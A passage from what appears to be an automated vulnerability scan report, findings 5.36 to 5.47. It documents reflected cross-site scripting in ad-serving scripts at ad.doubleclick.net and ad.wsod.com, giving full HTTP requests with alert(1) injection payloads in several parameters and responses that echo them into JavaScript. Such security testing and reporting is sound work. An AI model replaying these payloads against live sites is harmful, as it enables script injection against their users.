this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B
...[SNIP]...

5.36. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3154a"-alert(1)-"6f2ae5e4955 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37138
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:13 GMT
Expires: Tue, 26 Apr 2011 18:42:13 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
hUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B60113228%3B4986-300/600%3B41668203/41685990/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.37. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.100

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b3a6"-alert(1)-"763dbf5867a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37138

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
)
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/b%3B236470471%3B0-0%3B0%3B6011322
...[SNIP]...

5.38. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc29d"-alert(1)-"63a898666d6 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/2
...[SNIP]...

5.39. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 970af"-alert(1)-"c3c5aa073d6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs
...[SNIP]...

5.40. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc82d"-alert(1)-"c81877f4178 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
is.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.41. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae172"-alert(1)-"f6eedac639f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
tude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.42. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5188d"-alert(1)-"a33579bde31 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/250%3B41450394/41468181/
...[SNIP]...

5.43. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f01"-alert(1)-"f34eea5e6e6 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B4
...[SNIP]...

5.44. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4009"-alert(1)-"ec217f7248b was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36947
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:04 GMT
Expires: Tue, 26 Apr 2011 18:42:04 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ghUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248bhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/250%3B41450394/41468181/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.45. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e018"-alert(1)-"0e1e7727ec4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
)
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413
...[SNIP]...

5.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8012'-alert(1)-'4150aa4ae71 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:00 GMT; path=/
Set-Cookie: i_1=33:1411:836:100:0:40771:1303843020:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }

...[SNIP]...

5.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b897'-alert(1)-'1221f18c50f was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:52 GMT; path=/
